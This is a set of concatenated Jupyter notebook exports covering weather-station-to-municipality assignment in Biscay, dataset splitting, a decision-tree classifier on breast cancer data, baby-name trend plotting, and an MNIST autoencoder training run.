coordinate locations, so we will have to create our own Geodataframe). Start by importing the data. Biscay Province GDF / Shapefile **Load Map from Spain and Basque Country as it might be useful** ###Code # Municipality shapefile (readable as a GeoDataFrame) that we have already worked with before to get the maps biscay_gdf = gpd.read_file('../../../Other_open_data/shapefiles/biscay/geodataframe_biscay_municipalities.shp') biscay_gdf.rename({"municipali":"municipality","code_munic":"code_municipality"}, axis=1, inplace=True) '''Add coordinates for the center of each Municipality, taken as the average central point of the region. This will be used as the distance reference (as recommended by JC)''' biscay_gdf["UTM_points"] = biscay_gdf.geometry.centroid # inspection of the Biscay GDF biscay_gdf.info() ###Output <class 'geopandas.geodataframe.GeoDataFrame'> RangeIndex: 112 entries, 0 to 111 Data columns (total 4 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 municipality 112 non-null object 1 code_municipality 112 non-null object 2 geometry 112 non-null geometry 3 UTM_points 112 non-null geometry dtypes: geometry(2), object(2) memory usage: 3.6+ KB ###Markdown Weather Stations GDF / Shapefile ###Code # Load the stations CSV we have from the client; we will need to work this into a GeoDataFrame stations_df = pd.read_csv("../../../Input_open_data/ds05_LOCALIZACION-ESTACIONES-METEOROLOGICAS.csv",sep=";") # Convert column names to lower case for practical reasons stations_df.columns = stations_df.columns.str.lower() # Set the index to Station, Station Code and Station Type because it will be useful to get the closest municipality stations_df.set_index(["estacion","codigo","tipo"], inplace=True) ###Output _____no_output_____ ###Markdown Now create a new column that will use the Point method from the package shapely.geometry ###Code stations_df["UTM_points"] = [Point(x, y) for x, y in zip(stations_df.xutm, stations_df.yutm)] ###Output _____no_output_____ ###Markdown Convert it to a Geodataframe so we can make our desired
calculations(point distances). ###Code #Create a GeoDataFrame that can be saved as Shapefile and Inspect it stations_gdf = gpd.GeoDataFrame(stations_df, crs="EPSG:25830", geometry=stations_df.UTM_points) stations_gdf.info() ###Output <class 'geopandas.geodataframe.GeoDataFrame'> MultiIndex: 102 entries, ('Abetxuko', 'C076', 'A') to ('Zizurkil', 'C029', 'M') Data columns (total 5 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 xutm 102 non-null int64 1 yutm 102 non-null int64 2 cota (m) 102 non-null int64 3 UTM_points 102 non-null object 4 geometry 102 non-null geometry dtypes: geometry(1), int64(3), object(1) memory usage: 14.3+ KB ###Markdown Quick Data Visualization of Weather Stations vs Municipalities Plot the 2 Geodataframes to get an image of how many Meteo Stations from our dataset we have that are located within the Biscay region.- We can clearly see that most meteo Stations lie outside the Biscay Province- We can confirm that only 30 stations are within the Biscay Province ###Code # Load Basque Country GDF / Shapefile so we can: # add texture to the map and it does not plot blank areas for Weather Stations that lie outside Biscay Province #Load Spain Map GeoDataframe & Set projection to UTM (same as we have in our map exploration) spain_provinces_gdf = gpd.read_file("../../../Other_open_data/shapefiles/spain/gadm36_ESP_2.shx") spain_provinces_gdf.to_crs("EPSG:25830",inplace=True) spain_provinces_gdf.set_crs("EPSG:25830",inplace=True) # Slice GeoDataframe for Basque Country only basque_country_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1 == "País Vasco",:] # Slice GeoDataFrame for surrounding regions (it gives nicer maps plots) surrounding_regions_gdf = spain_provinces_gdf.loc[spain_provinces_gdf.NAME_1.isin(["Cantabria","País Vasco","Castilla y León"]),:] ############################################################################################################## # Save the sliced GDFs to shapefiles that we can use later if needed for other maps explorations (only used 1) #basque_country_gdf.to_file("basque_country_UTM", driver='ESRI Shapefile') #surrounding_regions_gdf.to_file("cantabria_paisvasco_castillayleon_UTM", driver='ESRI Shapefile') # Create Basemap of Basque Country ax = basque_country_gdf.plot(figsize=(20, 20), zorder=2, color='gainsboro', edgecolor='#737373') # Add layer of Spain Map for more texture. 
spain_provinces_gdf.plot(zorder=1, color='White', edgecolor='#737373', ax=ax) # Create base map of Biscay Provinces biscay_gdf.geometry.plot(zorder=3, color='#ffffd4', edgecolor='#bf5b17', ax=ax) # Add wasp locations map stations_gdf.plot(label="Weather Stations location", color='#cc4c02', zorder=4, markersize=45, ax=ax) # Set legends ax.legend(loc='best', shadow=True, fontsize='xx-large', markerscale = 2) # Set axis titles ax.set_title('Location of Weather Stations within the Basque Country', pad = 20, fontdict={'fontsize':25, 'color': '#4873ab'}) ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16}) ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16}) ax.set_xlim(461500, 605000) ax.set_ylim(4700900, 4813000) ax.set_facecolor('#4292c6') plt.show() #plt.savefig('weather_stations_map.png') stations_gdf_clipped = gpd.clip(stations_gdf, biscay_gdf) # Create base map of Biscay Provinces ax = biscay_gdf.geometry.plot(figsize=(15, 15), zorder=1, color='#ffffcc', edgecolor='#bf5b17') # Add wasp locations map stations_gdf_clipped.plot(label="Weather Stations location", color='red', zorder=5, markersize=20, ax=ax) # Set axis titles ax.set_title('Weather Stations in the Biscay Province (YTD)', pad = 20, fontdict={'fontsize':20, 'color': '#4873ab'}) ax.set_xlabel('Longitude (UMT)') ax.set_ylabel('Latitude (UMT)') plt.show() ###Output _____no_output_____ ###Markdown The Actual Python Script Template to Assign Weather Stations Now that we have both GeoDataFrames we need to calculate the distance points using the .distance() method. We test it for the 1st Municipality in the Biscay geoDataFrame.1 ) For the first Municipality (Gordexola) in the Biscay Municipality GeoDataFrame (the 0 index position),2 ) We calculate the distances between all stations and find the Station index with the lowest value. ###Code stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"]) # From the output we confirm that it creates a series with distances for all stations for Gordexola (0 based index) municipality biscay_gordexola = stations_gdf.distance(biscay_gdf.loc[0, "UTM_points"]).idxmin() biscay_gordexola #From the series we select the one with the minimum distance. #The output shows that the closest station for Gordexola is Soudpe-Herrerias. ###Output _____no_output_____ ###Markdown - **Now that we have the formula for 1 Municipality, we want to iterate through all municipalities so we don't have to go 1 by 1 though all 112.**- **We create a For Loop that will give the minimum distances for all Municipalities.** ###Code '''Create a for loop to iterate through each Minicipality. The loop is calculating: 1) the distance of each station for i0(Gordexola) and giving the index of the station where the distance is minimized, 2) then the distance of each station for i1(Gexto) and giving the index of the station where the distance is minimized 3) etc... 
until it reaches the end of the Municipality GeoDataFrame which has 1 unique Municipality as an Index''' closest_stations_list = [] for i in biscay_gdf.UTM_points: closest_stations_list.append(stations_gdf.geometry.distance(i).idxmin()) ''' IDEA TO CORRECT WEATHER STATIONS WITH MISSING VALUES: closest_stations_list = [] for i in biscay_gdf.UTM_points: closest_station_i = stations_gdf.geometry.distance(i).nsmallest(n=2,keep="first").index if closest_station_i[0][1] not in WBds02_METEO.csv.station_code.values: #######confirm/check this line closest_stations_list.append(closest_station_i[1]) else: closest_stations_list.append(closest_station_i[0]) ''' # Create a new series with the new list closest_stations_series = pd.Series(closest_stations_list,name="closest_station") # Add the newly created Series as a new column for each Municipality showing the closest station biscay_gdf["closest_station"] = closest_stations_series # Manually replace the station that does not exist in WBds02_METEO.csv # first find the index for the Municipality to assign a new station print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"]) # then extract the 2nd closest weather station biscay_zaratamo_48097 = stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index[1] biscay_basauri_48015 = stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index[1] biscay_galdakao_48036 = stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index[1] # then replace the value in the DataFrame to later save as a .csv file biscay_gdf.at[97,"closest_station"] = biscay_zaratamo_48097 biscay_gdf.at[23,"closest_station"] = biscay_basauri_48015 biscay_gdf.at[41,"closest_station"] = biscay_galdakao_48036 ###Output 97 POINT (510759.931 4783835.490) Name: UTM_points, dtype: geometry 23 POINT (509085.637 4786507.059) Name: UTM_points, dtype: geometry 41 POINT (513424.801 4786444.656) Name: UTM_points, dtype: geometry ###Markdown Use the same code to add a new column with the distance (for checking purposes). 
###Code #Here the loop is calculating for each Municipality the distance of stations and giving the minimum distance only distance_stations_list = [] for i in biscay_gdf.UTM_points: distance_stations_list.append(round(stations_gdf.geometry.distance(i).min(),0)) ''' Need to check how to get min distance, maybe using the "closest station" column created previously and finding it in the stations_gdf ''' # Create a new series with the new list distance_stations_series = pd.Series(distance_stations_list,name="station_distance(meters)") # The newly created Series as a new column for each Municipality showing the closest station biscay_gdf["station_distance(meters)"] = distance_stations_series.astype(int) # Manually replace the station that does not exist in WBds02_METEO.csv # first find the index for the Municipality to assign a new station print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"]) # then extract the 2nd closest weather station biscay_zaratamo_48097_dis = round(stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2)[1],0) biscay_basauri_48015_dis = round(stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2)[1],0) biscay_galdakao_48036_dis = round(stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2)[1],0) # then replace the value in the DataFrame to later save as a .csv file biscay_gdf.at[97,"station_distance(meters)"] = biscay_zaratamo_48097_dis biscay_gdf.at[23,"station_distance(meters)"] = biscay_basauri_48015_dis biscay_gdf.at[41,"station_distance(meters)"] = biscay_galdakao_48036_dis ###Output 97 POINT (510759.931 4783835.490) Name: UTM_points, dtype: geometry 23 POINT (509085.637 4786507.059) Name: UTM_points, dtype: geometry 41 POINT (513424.801 4786444.656) Name: UTM_points, dtype: geometry ###Markdown Use the same code to add a new series with the number of stations that lie within each Municipality, using the .within() method. ###Code #Here the loop is calculating for each Municipality the sum of stations that are within the Municipality number_stations_list = [] for i in biscay_gdf.geometry: number_stations_list.append(stations_gdf.geometry.within(i).sum()) # Create a new series with the new list number_stations_series = pd.Series(number_stations_list,name="number_stations") # The newly created Series as a new column for each Municipality showing the closest station biscay_gdf["number_of_stations"] = number_stations_series ###Output _____no_output_____ ###Markdown Use the same code to add a new series with the coordinates of closest stations for each Municipality in order to map them and be able to check if the distances calculated seem correct. 
###Code closest_stations_coords_list = [] for i in biscay_gdf.UTM_points: closest_stations_coords_list.append(stations_gdf.loc[stations_gdf.geometry.distance(i).idxmin(),"geometry"]) # Create a new series with the new list closest_stations_coords_series = gpd.GeoSeries(closest_stations_coords_list) # The newly created Series as a new column for each Municipality showing the closest station biscay_gdf["closest_station_UTM"] = closest_stations_coords_series # Manually replace the station that does not exist in WBds02_METEO.csv # first find the index for the Municipality to assign a new station print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Zaratamo"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Basauri"),"UTM_points"]) print(biscay_gdf.loc[biscay_gdf.municipality.str.contains("Galdakao"),"UTM_points"]) # then extract the 2nd closest weather station biscay_zaratamo_48097_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[97, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1] biscay_basauri_48015_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[23, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1] biscay_galdakao_48036_point = stations_gdf.loc[stations_gdf.distance(biscay_gdf.loc[41, "UTM_points"]).nsmallest(n=2).index,"geometry"].iloc[1] # then replace the value in the DataFrame to later save as a .csv file biscay_gdf.at[97,"closest_station_UTM"] = biscay_zaratamo_48097_point biscay_gdf.at[23,"closest_station_UTM"] = biscay_basauri_48015_point biscay_gdf.at[41,"closest_station_UTM"] = biscay_galdakao_48036_point # check if the replaced values for C0B2 look to have worked properly biscay_gdf.loc[biscay_gdf.code_municipality.isin(["48097","48015","48036"]),:] ###Output _____no_output_____ ###Markdown Save CSV with new assigned Weather Stations for each MunicipalityFinally, save the csv file to upload to Github and keep the same current format by slicing and adapting current format layot. 
###Code # Save file as CSV to replace WBds01_weather2municipality.csv # 1st) extract station_code to maintain same format as Github csv biscay_gdf.closest_station = biscay_gdf.closest_station.apply(str) station_code = biscay_gdf.closest_station.str.split(", ", n=3, expand=True) station_code = station_code.iloc[:,1].str.replace("'","") station_code = pd.Series(station_code, name="station_code") # insert station_code series in biscay_gdf biscay_gdf["station_code"] = station_code # rename municipality code column to maintain same format as csv file biscay_gdf.rename({"code_municipality":"municip_code"}, axis=1, inplace=True) # 2nd) create DataFrame that has the same format as the csv file in Github with the new stations assigned to a Municipality WBds01_weather2municipality = pd.DataFrame(data = biscay_gdf, columns= ["station_code","municip_code"]) WBds01_weather2municipality.sort_values(by="municip_code", ascending=True, inplace=True) # 3rd) save the new csv file WBds01_weather2municipality.to_csv("WBds01_GEO.csv", index=False) ###Output _____no_output_____ ###Markdown Double Check / Spot Mistakes Inspect the newly Created GDF and perform some checks ###Code biscay_gdf.info() biscay_gdf # run this and inspect df in Excel to spot if there are obvious mistakes #biscay_gdf.to_excel("weather_to_municp.xlsx", index=False) # if empty, then no municipality assigned to station C0B2 (which is not present in our METEO dataset) biscay_gdf.loc[biscay_gdf.station_code.str.contains("C0B2"),:] ###Output _____no_output_____ ###Markdown Plot the Result in a Map - Do a quick check to see if it is working correctly, ploting the distances in a map.- JC suggests to use it for EDA ###Code #Generate a new GDF with index as Municipalities to be able to groupby biscay_gdf2 = biscay_gdf.set_index("municipality") #Get the Closest Stations Geometry Coordinate Points station_points_gdf = biscay_gdf2.closest_station_UTM #Get the Municipality's average center Coordinate Points municipality_points_gdf = biscay_gdf2.UTM_points #Append in a new Dataframe to then groupby and generate using the Linestrings method #lines from Municipality center point to the Stations Point path_df = station_points_gdf.append(municipality_points_gdf) #Groupby Municipality and Get the LineString to have a path object path_df = path_df.groupby(by="municipality").apply(list).apply(lambda x: LineString(x)).reset_index() #Columns is empty so rename it to "geometry" path_df.rename({0:"geometry"},axis=1,inplace=True) #Set the geometry column as type Geometry & the CRS to "EPSG:25830" (same as other projections) path_gdf = gpd.GeoDataFrame(path_df, geometry=path_df.geometry) path_gdf.crs = "EPSG:25830" # Set basemaps ax = biscay_gdf.plot(figsize=(20, 20), zorder=2, color='#ffffd4', edgecolor='#bf5b17') surrounding_regions_gdf.plot(zorder=1, color='#f7f7f7', edgecolor='#737373', ax=ax) # Set results plots path_gdf.plot(label="Path to assigned Weather Station", zorder=2,linestyle='-', linewidth=1, ax=ax) municipality_points_gdf.plot(label="Municipality Center", color='green',markersize=20, zorder=3, ax=ax) stations_gdf.plot(label="Weather Stations", color='#cc4c02',markersize=40, zorder=4, ax=ax) # Set legends ax.legend(loc='upper left', shadow=True, fontsize='xx-large', markerscale = 2) # Set axis titles ax.set_title('Weather Stations assigned to Biscay Municipalities', pad = 20, fontdict={'fontsize':25, 'color': '#4873ab'}) ax.set_xlabel('Longitude (UMT)', fontdict={'fontsize':16}) ax.set_ylabel('Latitude (UMT)',fontdict={'fontsize':16}) 
ax.set_xlim(461500, 550000) ax.set_ylim(4757000, 4813000) ax.set_facecolor('#4292c6') plt.plot() #plt.savefig("assigned_weather_stations_map.png") ###Output _____no_output_____
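###Markdown
Newer GeoPandas versions can replace the three distance loops above with a single spatial join. A sketch, assuming GeoPandas >= 0.10 is available; up to ties, the assignment should match the loop-based result (before the manual C0B2 corrections).
###Code
# Sketch: vectorised nearest-station assignment with gpd.sjoin_nearest
centroids = gpd.GeoDataFrame(
    biscay_gdf[["municipality", "municip_code"]],
    geometry=biscay_gdf.UTM_points, crs="EPSG:25830")

nearest = gpd.sjoin_nearest(
    centroids,
    stations_gdf.reset_index(),            # exposes estacion/codigo/tipo as columns
    how="left",
    distance_col="station_distance(meters)")

print(nearest[["municipality", "codigo", "station_distance(meters)"]].head())
###Output
_____no_output_____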
dataprep/combine_datasets.ipynb
###Markdown Combining Data ###Code dataset = pd.DataFrame() dataset['path'] = images1 + '/' + df1['id_code'] + '.' + ext1 dataset['level'] = df1['diagnosis'] dataset.head() dataset2 = pd.DataFrame() dataset2['path'] = images2 + '/' + df2['image'] + '.' + ext2 dataset2['level'] = df2['level'] dataset2.head() dataset = dataset.append(dataset2, ignore_index=True) dataset['level'].value_counts() dataset = dataset.sort_values(by='level', ascending=False) dataset = dataset.head(dataset['level'].value_counts()[1]*2) dataset['level'].value_counts() ###Output _____no_output_____ ###Markdown Splitting ###Code from sklearn.model_selection import train_test_split train, test = train_test_split(dataset, test_size=0.25) train.head() BASE_PATH = "/mnt/Datasets/datasets/" train.to_csv(os.path.join(BASE_PATH, 'combined_train_split.csv'), index=False) test.to_csv(os.path.join(BASE_PATH, 'combined_test_split.csv'), index=False) ###Output _____no_output_____
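###Markdown
One caveat with the plain split above: class proportions can drift between train and test. A sketch of a stratified variant that keeps the level distribution identical in both splits (it requires at least two rows per remaining class); the seed value is arbitrary.
###Code
# Sketch: stratified split preserving the class balance built above
train_s, test_s = train_test_split(
    dataset, test_size=0.25, stratify=dataset['level'], random_state=42)

print(train_s['level'].value_counts(normalize=True))
print(test_s['level'].value_counts(normalize=True))
###Output
_____no_output_____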
Lab4/CE121_Lab4_02.ipynb
###Markdown CE-121 ###Code #Import scikit-learn dataset library from sklearn import datasets from sklearn import preprocessing from sklearn.tree import DecisionTreeClassifier import pandas as pd import numpy as np import matplotlib.pyplot as plt #Load dataset bcancer = datasets.load_breast_cancer() # print the names of the 30 features print("Features: ",bcancer.feature_names) # print the label type of cancer(malignant, benign) print("Labels: ",bcancer.target_names) # print data(feature)shape print("data shape: ",bcancer.data.shape) #print target shape print("target shape: ",bcancer.target.shape) print(bcancer.keys()) dataset = pd.DataFrame(bcancer.data, columns=[bcancer.feature_names]) #dataset['Target'] = pd.Series(data=bcancer.target, index=dataset.index) dataset['target']=bcancer.target print(dataset.tail()) y_enc=dataset.iloc[:,30] print(y_enc) le=preprocessing.LabelEncoder() y_enc=le.fit_transform(y_enc) print(y_enc) dataset=dataset.drop(['target'],axis=1) print(dataset.tail()) ohe=preprocessing.OneHotEncoder(dtype=np.int) x_enc=ohe.fit_transform(dataset) print(x_enc) print(ohe.get_feature_names(bcancer.feature_names)) print(len(ohe.get_feature_names(bcancer.feature_names))) from pandas.core.common import random_state #train test division(50%-50%) from sklearn.model_selection import train_test_split X_train, X_test, Y_train, Y_test = train_test_split(x_enc,y_enc, test_size = 0.50,random_state=121) print(X_train) #create DecisionTree model dtc=DecisionTreeClassifier(criterion="entropy",random_state=121,max_leaf_nodes=121) dtc.fit(X_train,Y_train) pred_op=dtc.predict(X_test) print("predicted output: ",pred_op) print("actual test output: ",Y_test) from sklearn import metrics print("Accuracy is :- ",metrics.accuracy_score(Y_test, pred_op)) from sklearn.metrics import precision_score from sklearn.metrics import recall_score precision = precision_score(Y_test, pred_op) recall = recall_score(Y_test, pred_op) print("precision :- ",precision) print("recall :- ",recall) # from sklearn.tree import export_graphviz # export_graphviz(dtc,out_file='tree_entropy.dot', # feature_names=ohe.get_feature_names(bcancer.feature_names),class_names=list(bcancer.target_names), # filled=True,max_depth=122) # #convert to png # from subprocess import call # call(['dot', '-Tpng', 'tree_entropy.dot', '-o', 'tree_entropy.png', '-Gdpi=600']) # # Display in python # import matplotlib.pyplot as plt # plt.figure(figsize = (14, 18)) # plt.imshow(plt.imread('tree_entropy.png')) # plt.axis('off'); # plt.show(); from sklearn.metrics import confusion_matrix confusion_matrix(Y_test, pred_op) disp = metrics.plot_confusion_matrix(dtc, X_test, Y_test) disp.figure_.suptitle("Confusion Matrix") print("Confusion matrix:\n",disp.confusion_matrix) plt.show() ###Output Confusion matrix: [[ 6 89] [ 3 187]]
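###Markdown
A single 50%-50% split gives a noisy accuracy estimate. As a sketch, k-fold cross-validation on the same one-hot-encoded features yields a more stable figure (same hyperparameters as the tree above).
###Code
# Sketch: 5-fold cross-validation of the same decision tree
from sklearn.model_selection import cross_val_score

cv_scores = cross_val_score(
    DecisionTreeClassifier(criterion="entropy", random_state=121,
                           max_leaf_nodes=121),
    x_enc, y_enc, cv=5, scoring="accuracy")

print("fold accuracies :- ", cv_scores)
print("mean accuracy :- %.4f (+/- %.4f)" % (cv_scores.mean(), cv_scores.std()))
###Output
_____no_output_____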
content/blog/notebooks/2016/02/ssn-names.ipynb
###Markdown ReproduceIt is a series of articles that reproduce the results from data analysis articles, focusing on having open data and open code. Today, as a small return for the [ReproduceIt series](http://danielfrg.com/tag/reproduceit.html), I try to reproduce a simple but nice data analysis and web app that [braid.io](http://braid.io/) did, called [Most Beyonces are 14 years old and most Kanyes are about 11](http://braid.io/tile/name-trends). The article analyses the trend of names of some music artists (Beyoncé, Kanye and Madonna) in the US; it also offers some nice possible explanations for the ups and downs over time. It's a quick read. The data comes from the Social Security Administration and can be downloaded from the [SSN website: Beyond the Top 1000 Names](https://www.ssa.gov/oact/babynames/limits.html). The data is very small, and loading it into pandas and plotting it with bokeh was very easy. ###Code %matplotlib inline import pandas as pd import os data_dir = os.path.expanduser("~/data/names/names") files = os.listdir(data_dir) data = pd.DataFrame(columns=["year", "name", "sex", "occurrences"]) for fname in files: if fname.endswith(".txt"): fpath = os.path.join(data_dir, fname) df = pd.read_csv(fpath, header=None, names=["name", "sex", "occurrences"]) df["year"] = int(fname[3:7]) data = data.append(df) data.year = data.year.astype(int) data.head() data.shape data.dtypes ###Output _____no_output_____ ###Markdown Beyonce
Now that the data is in a simple dataframe, we can just filter by the name we want and make a bar chart. ###Code beyonce = data[data["name"] == "Beyonce"][["year", "occurrences"]] from bokeh.charts import ColumnDataSource, Bar, output_notebook, show from bokeh.models import HoverTool output_notebook() p = Bar(data=beyonce, label="year", values="occurrences", title="No. Babies named Beyoncé", color="#0277BD", ylabel='', tools="save,reset") show(p) ###Output _____no_output_____
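###Markdown
The bokeh.charts module used above was removed in later Bokeh releases, so as a version-independent sketch, the same comparison for several artists can be drawn with plain pandas plotting (assuming these unaccented spellings appear in the SSA files, which store names without accents).
###Code
# Sketch: compare several artist names at once with pandas + matplotlib
names = ["Beyonce", "Kanye", "Madonna"]
subset = data[data["name"].isin(names)]
# sum over sex so each (year, name) pair becomes a single count
pivot = subset.pivot_table(index="year", columns="name",
                           values="occurrences", aggfunc="sum").fillna(0)
pivot.plot(figsize=(10, 4), title="Babies per year by name")
###Output
_____no_output_____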
chapter_2/ch2_autoencoder.ipynb
###Markdown Load MNIST dataset ###Code (ds_train, ds_test_), ds_info = tfds.load('mnist', split=['train', 'test'], shuffle_files=True, as_supervised=True, with_info=True) batch_size = 256 def preprocess(image, label): image = tf.cast(image, tf.float32) image = image/255. return image, image ds_train = ds_train.map(preprocess) ds_train = ds_train.cache() # put dataset into memory ds_train = ds_train.shuffle(ds_info.splits['train'].num_examples) ds_train = ds_train.batch(batch_size) ds_test = ds_test_.map(preprocess).batch(batch_size).cache().prefetch(batch_size) # return label for testing def preprocess_with_label(image, label): image = tf.cast(image, tf.float32) image = tf.math.round(image/255.) return image, label ds_test_label = ds_test_.map(preprocess_with_label).batch(1000) ###Output _____no_output_____ ###Markdown Building Autoencoder ###Code def Encoder(z_dim): inputs = layers.Input(shape=[28,28,1]) x = inputs x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x) x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = Conv2D(filters=8, kernel_size=(3,3), strides=2, padding='same', activation='relu')(x) x = Conv2D(filters=8, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = Flatten()(x) out = Dense(z_dim)(x) return Model(inputs=inputs, outputs=out, name='encoder') def Decoder(z_dim): inputs = layers.Input(shape=[z_dim]) x = inputs x = Dense(7*7*64, activation='relu')(x) x = Reshape((7,7,64))(x) x = Conv2D(filters=64, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = UpSampling2D((2,2))(x) x = Conv2D(filters=32, kernel_size=(3,3), strides=1, padding='same', activation='relu')(x) x = UpSampling2D((2,2))(x) out = Conv2D(filters=1, kernel_size=(3,3), strides=1, padding='same', activation='sigmoid')(x) #return out return Model(inputs=inputs, outputs=out, name='decoder') class Autoencoder: def __init__(self, z_dim): self.encoder = Encoder(z_dim) self.decoder = Decoder(z_dim) model_input = self.encoder.input model_output = self.decoder(self.encoder.output) self.model = Model(model_input, model_output) autoencoder = Autoencoder(z_dim=10) model_path = "./models/autoencoder.h5" checkpoint = ModelCheckpoint(model_path, monitor= "val_loss", verbose=1, save_best_only=True, mode= "auto", save_weights_only = False) early = EarlyStopping(monitor= "val_loss", mode= "auto", patience = 5) callbacks_list = [checkpoint, early] autoencoder.model.compile( loss = "bce", optimizer=tf.keras.optimizers.RMSprop(learning_rate=3e-4)) #metrics=[tf.keras.losses.BinaryCrossentropy()]) autoencoder.model.fit(ds_train, validation_data=ds_test, epochs = 100, callbacks = callbacks_list) ###Output Epoch 1/100 235/235 [==============================] - ETA: 0s - loss: 0.2658 Epoch 00001: val_loss improved from inf to 0.18209, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 8ms/step - loss: 0.2658 - val_loss: 0.1821 Epoch 2/100 235/235 [==============================] - ETA: 0s - loss: 0.1691 Epoch 00002: val_loss improved from 0.18209 to 0.14860, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1691 - val_loss: 0.1486 Epoch 3/100 232/235 [============================>.] 
- ETA: 0s - loss: 0.1472 Epoch 00003: val_loss improved from 0.14860 to 0.13958, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1471 - val_loss: 0.1396 Epoch 4/100 227/235 [===========================>..] - ETA: 0s - loss: 0.1379 Epoch 00004: val_loss improved from 0.13958 to 0.13258, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1378 - val_loss: 0.1326 Epoch 5/100 230/235 [============================>.] - ETA: 0s - loss: 0.1325 Epoch 00005: val_loss improved from 0.13258 to 0.12724, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1324 - val_loss: 0.1272 Epoch 6/100 235/235 [==============================] - ETA: 0s - loss: 0.1287 Epoch 00006: val_loss improved from 0.12724 to 0.12569, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1287 - val_loss: 0.1257 Epoch 7/100 233/235 [============================>.] - ETA: 0s - loss: 0.1259 Epoch 00007: val_loss improved from 0.12569 to 0.12421, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1260 - val_loss: 0.1242 Epoch 8/100 234/235 [============================>.] - ETA: 0s - loss: 0.1237 Epoch 00008: val_loss improved from 0.12421 to 0.12303, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1237 - val_loss: 0.1230 Epoch 9/100 232/235 [============================>.] - ETA: 0s - loss: 0.1220 Epoch 00009: val_loss improved from 0.12303 to 0.12149, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1219 - val_loss: 0.1215 Epoch 10/100 234/235 [============================>.] - ETA: 0s - loss: 0.1205 Epoch 00010: val_loss improved from 0.12149 to 0.11844, saving model to ./models/autoencoder.h5 235/235 [==============================] - 2s 6ms/step - loss: 0.1205 - val_loss: 0.1184 Epoch 11/100 228/235 [============================>.] - ETA: 0s - loss: 0.1191 Epoch 00011: val_loss did not improve from 0.11844 235/235 [==============================] - 1s 6ms/step - loss: 0.1191 - val_loss: 0.1199 Epoch 12/100 233/235 [============================>.] - ETA: 0s - loss: 0.1180 Epoch 00012: val_loss improved from 0.11844 to 0.11633, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1180 - val_loss: 0.1163 Epoch 13/100 235/235 [==============================] - ETA: 0s - loss: 0.1170 Epoch 00013: val_loss improved from 0.11633 to 0.11440, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1170 - val_loss: 0.1144 Epoch 14/100 229/235 [============================>.] - ETA: 0s - loss: 0.1161 Epoch 00014: val_loss did not improve from 0.11440 235/235 [==============================] - 1s 6ms/step - loss: 0.1161 - val_loss: 0.1186 Epoch 15/100 232/235 [============================>.] - ETA: 0s - loss: 0.1154 Epoch 00015: val_loss did not improve from 0.11440 235/235 [==============================] - 1s 6ms/step - loss: 0.1153 - val_loss: 0.1145 Epoch 16/100 234/235 [============================>.] - ETA: 0s - loss: 0.1146 Epoch 00016: val_loss improved from 0.11440 to 0.11381, saving model to ./models/autoencoder.h5 235/235 [==============================] - 1s 6ms/step - loss: 0.1146 - val_loss: 0.1138 Epoch 17/100 234/235 [============================>.] 
